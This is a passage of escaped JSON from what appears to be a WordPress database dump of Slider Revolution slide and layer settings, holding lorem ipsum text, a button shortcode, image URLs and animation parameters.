:{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"40px\",\"e\":true},\"n\":{\"v\":\"70px\",\"e\":true},\"t\":{\"v\":\"40px\",\"e\":true},\"m\":{\"v\":\"40px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#171717\",\"e\":true},\"n\":{\"v\":\"#171717\",\"e\":true},\"t\":{\"v\":\"#171717\",\"e\":true},\"m\":{\"v\":\"#171717\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"15\":{\"text\":\"Lorem ipsum dolor sit amet, in doctus voluptua mei. At sit nibh audire, eu qui legere alienum, ea vel exerci consul aperiam. Percipit adversarium per in justo nonumes.\",\"alias\":\"Lorem ipsum dolor si...\",\"uid\":15,\"size\":{\"width\":{\"d\":{\"v\":\"575px\",\"e\":true},\"n\":{\"v\":\"526px\",\"e\":true},\"t\":{\"v\":\"539px\",\"e\":true},\"m\":{\"v\":\"539px\"}},\"height\":{\"d\":{\"e\":true},\"n\":{\"v\":\"69px\",\"e\":true},\"t\":{\"v\":\"69px\",\"e\":true},\"m\":{\"v\":\"69px\"}},\"originalWidth\":\"575px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-333px\",\"e\":true},\"n\":{\"v\":\"-235px\",\"e\":true},\"t\":{\"v\":\"-26px\",\"e\":true},\"m\":{\"v\":\"-26px\"}},\"y\":{\"d\":{\"v\":\"17px\",\"e\":true},\"n\":{\"v\":\"45px\",\"e\":true},\"t\":{\"v\":\"198px\",\"e\":true},\"m\":{\"v\":\"198px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true}},\"zIndex\":16,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":16,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":620},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":800,\"start\":620,\"startRelative\":620},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":800,\"start\":620,\"startRelative\":620},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1580,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"v\":\"20px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\"}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"30px\",\"e\":true},\"n\":{\"v\":\"30px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"text\",\"version\":\"6.6.0\"},\"25\":{\"text\":\"[qodef_button text=\\\"view more\\\" target=\\\"_self\\\" icon_pack=\\\"\\\" font_weight=\\\"\\\" text_transform=\\\"\\\"]\",\"alias\":\"Button\",\"uid\":25,\"size\":{\"width\":{\"d\":{\"v\":\"506px\",\"e\":true},\"n\":{\"v\":\"506px\",\"e\":true},\"t\":{\"v\":\"506px\",\"e\":true},\"m\":{\"v\":\"506px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"506px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-367px\",\"e\":true},\"n\":{\"v\":\"-243px\",\"e\":true},\"t\":{\"v\":\"-42px\",\"e\":true},\"m\":{\"v\":\"169px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"114px\",\"e\":true},\"n\":{\"v\":\"152px\",\"e\":true},\"t\":{\"v\":\"281px\",\"e\":true},\"m\":{\"v\":\"148px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":17,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":17,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":700},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":800,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":800,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"}}','{\"hor_lines\":[\"149px\"],\"version\":\"6.6.0\"}'),(9,4,2,'{\"title\":\"second\",\"bg\":{\"type\":\"solid\",\"color\":\"#eff0ea\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"02\"},{\"v\":\"03\"}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"6\":{\"text\":\"Image 6\",\"alias\":\"Flaster\",\"uid\":6,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic2-1.png\",\"imageId\":3266},\"size\":{\"width\":{\"d\":{\"v\":\"418px\",\"e\":true},\"n\":{\"v\":\"305px\",\"e\":true},\"t\":{\"v\":\"305px\"},\"m\":{\"v\":\"221px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"129px\",\"e\":true},\"n\":{\"v\":\"94px\",\"e\":true},\"t\":{\"v\":\"94px\"},\"m\":{\"v\":\"68px\",\"e\":true}},\"originalWidth\":418,\"originalHeight\":129,\"aspectRatio\":{\"d\":{\"v\":3.24031007751938},\"n\":{\"v\":3.24031007751938},\"t\":{\"v\":3.24031007751938},\"m\":{\"v\":3.24031007751938}}},\"position\":{\"x\":{\"d\":{\"v\":\"182px\",\"e\":true},\"n\":{\"v\":\"133px\",\"e\":true},\"t\":{\"v\":\"40px\",\"e\":true},\"m\":{\"v\":\"-23px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"250px\",\"e\":true},\"n\":{\"v\":\"205px\",\"e\":true},\"t\":{\"v\":\"209px\",\"e\":true},\"m\":{\"v\":\"108px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":670},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"reverseDirection\":{\"rotationY\":true},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1390,\"start\":670,\"startRelative\":670},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1390,\"start\":670,\"startRelative\":670},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":940,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"1\":{\"text\":\"Image 1\",\"alias\":\"Bocica\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic1-1.png\",\"imageId\":3261},\"size\":{\"width\":{\"d\":{\"v\":\"912px\",\"e\":true},\"n\":{\"v\":\"560px\",\"e\":true},\"t\":{\"v\":\"560px\"},\"m\":{\"v\":\"419px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"718px\",\"e\":true},\"n\":{\"v\":\"441px\",\"e\":true},\"t\":{\"v\":\"441px\"},\"m\":{\"v\":\"330px\",\"e\":true}},\"originalWidth\":912,\"originalHeight\":718,\"aspectRatio\":{\"d\":{\"v\":1.2701949860724233},\"n\":{\"v\":1.2701949860724233},\"t\":{\"v\":1.2701949860724233},\"m\":{\"v\":1.2701949860724233}}},\"position\":{\"x\":{\"d\":{\"v\":\"572px\",\"e\":true},\"n\":{\"v\":\"369px\",\"e\":true},\"t\":{\"v\":\"200px\",\"e\":true},\"m\":{\"v\":\"149px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"34px\",\"e\":true},\"n\":{\"v\":\"60px\",\"e\":true},\"t\":{\"v\":\"84px\",\"e\":true},\"m\":{\"v\":\"35px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":6,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":690},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1400,\"start\":690,\"startRelative\":690},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1400,\"start\":690,\"startRelative\":690},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":910,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"w